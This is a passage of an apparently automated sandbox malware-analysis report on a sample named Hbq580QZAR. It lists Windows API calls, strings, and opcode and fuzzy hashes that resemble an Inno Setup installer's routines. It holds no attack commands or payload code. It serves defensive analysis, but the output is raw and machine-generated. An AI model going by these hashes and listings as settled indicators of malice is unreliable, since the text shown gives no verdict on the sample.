                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                            • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                            • API String ID: 884541143-1710247218
                                                                                            • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                            • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                            • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                            • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                            • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                            • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                            • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                            • API String ID: 190572456-3516654456
                                                                                            • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                            • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                            • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                            • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                            APIs
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                            • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                            • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                            • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$StretchText
                                                                                            • String ID:
                                                                                            • API String ID: 2984075790-0
                                                                                            • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                            • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                            • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                            • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                            APIs
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDirectoryHandleSystem
                                                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                            • API String ID: 2051275411-1862435767
                                                                                            • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                            • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                            • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                            • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                            APIs
                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                            • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                            • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$Color$Draw$OffsetRect
                                                                                            • String ID:
                                                                                            • API String ID: 1005981011-0
                                                                                            • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                            • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                            • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                            • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041B745
                                                                                            • GetDC.USER32(?), ref: 0041B751
                                                                                            • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                            • String ID: %H
                                                                                            • API String ID: 3275473261-1959103961
                                                                                            • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                            • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                            • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                            • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041BA17
                                                                                            • GetDC.USER32(?), ref: 0041BA23
                                                                                            • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                            • String ID: %H
                                                                                            • API String ID: 3275473261-1959103961
                                                                                            • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                            • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                            • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                            • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                            APIs
                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                            Strings
                                                                                            • Deleting Uninstall data files., xrefs: 004964FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                            • String ID: Deleting Uninstall data files.
                                                                                            • API String ID: 1570157960-2568741658
                                                                                            • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                            • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                            • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                            • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                            • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                            Strings
                                                                                            • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                            • Failed to open Fonts registry key., xrefs: 00470281
                                                                                            • AddFontResource, xrefs: 004702B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                            • API String ID: 955540645-649663873
                                                                                            • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                            • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                            • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                            • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                            APIs
                                                                                              • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                              • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                              • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                            • GetVersion.KERNEL32 ref: 00462E60
                                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                            • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                            • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                            • String ID: Explorer
                                                                                            • API String ID: 2594429197-512347832
                                                                                            • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                            • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                            • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                            • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC), ref: 004783CC
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                            • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                            • API String ID: 2704155762-2318956294
                                                                                            • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                            • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                            • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                            • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                            • LocalFree.KERNEL32(0058E568,00000000,00401B68), ref: 00401ACF
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0058E568,00000000,00401B68), ref: 00401AEE
                                                                                            • LocalFree.KERNEL32(0058F568,?,00000000,00008000,0058E568,00000000,00401B68), ref: 00401B2D
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID: hX
                                                                                            • API String ID: 3782394904-463809249
                                                                                            • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                            • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                            • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                            • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                              • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                            Strings
                                                                                            • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                            • Deleting directory: %s, xrefs: 00459E5B
                                                                                            • Stripped read-only attribute., xrefs: 00459E94
                                                                                            • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                            • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseErrorFindLast
                                                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                            • API String ID: 754982922-1448842058
                                                                                            • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                            • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                            • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                            • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                            APIs
                                                                                            • GetCapture.USER32 ref: 00422EA4
                                                                                            • GetCapture.USER32 ref: 00422EB3
                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                            • ReleaseCapture.USER32 ref: 00422EBE
                                                                                            • GetActiveWindow.USER32 ref: 00422ECD
                                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                            • GetActiveWindow.USER32 ref: 00422FBF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
